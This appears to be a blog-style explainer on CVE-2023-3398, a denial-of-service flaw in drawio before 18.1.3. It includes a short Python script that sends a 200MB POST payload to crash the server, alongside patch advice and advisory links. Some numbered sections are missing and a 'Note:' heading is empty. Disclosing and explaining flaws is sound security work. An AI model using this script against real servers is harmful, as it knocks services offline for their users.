CVE-2023-3398 - Denial of Service in drawio Before 18.1.3 – Everything You Need to Know

In June 2023, a vulnerability was discovered in the popular diagramming tool drawio (jgraph/drawio) that could crash the whole server. The bug, tracked as CVE-2023-3398, allows remote users to cause a Denial of Service (DoS) simply by sending a crafted request.

This issue affects versions before 18.1.3 of drawio.

2. What Is drawio?

drawio is a free and open source tool for making diagrams and flowcharts. Many organizations host it on their own servers or use it as part of Confluence, Jira, or other collaboration suites.

Having a DoS vulnerability in such a tool is risky, because a malicious actor could intentionally crash the service, causing an outage for every user.

3. The Vulnerability Explained

CVE-2023-3398 is a Denial of Service vulnerability.

How Does It Work?

In versions before 18.1.3, drawio had bad input validation in a specific function that processes image data. If a user could send a specially crafted request—especially a large or malicious payload—it would trigger an unexpected exception and crash the app. No authentication required. Anyone who can connect to the server can crash it.

Why Is That Bad?

It means that a person with basic access (even without logging in) can send the bad data and knock your drawio server offline for everyone else.

Crafting the Malicious Request

The details come from the original patch commit and security advisories.

The vulnerable endpoint processes images from user input. If you POST a malformed or huge image payload, the server runs out of memory or hits an unhandled exception, causing a crash.

Here’s a simple way to trigger a crash with a malicious POST request

import requests

# Replace with your drawio host
URL = "http://drawio.example.com/export";

# Send a gigantic payload to cause memory exhaustion
payload = "A" * (1024 * 1024 * 200)  # 200MB!

headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
    "xml": payload,
    "format": "svg"
}

response = requests.post(URL, data=data, headers=headers)
print("Status:", response.status_code)

Note:

5. How to Fix the Issue

Good news! The developers patched the bug in version 18.1.3.

Update drawio

- Upgrade to version 18.1.3 or newer as soon as possible.

📢 Official GitHub Advisory:

GHSA-8w42-gwg7-p5mx

📝 CVE Details:

CVE-2023-3398 at NIST NVD

🔒 Patch Commit:

GitHub diff for the patch

📦 Latest Release:

jgraph/drawio Releases

Update now if you host drawio yourself!

Stay secure. If you want to learn more about this or share your experience patching it, leave a comment or join the conversation on GitHub Discussions.

Timeline

Published on: 06/26/2023 11:15:00 UTC
Last modified on: 06/30/2023 13:01:00 UTC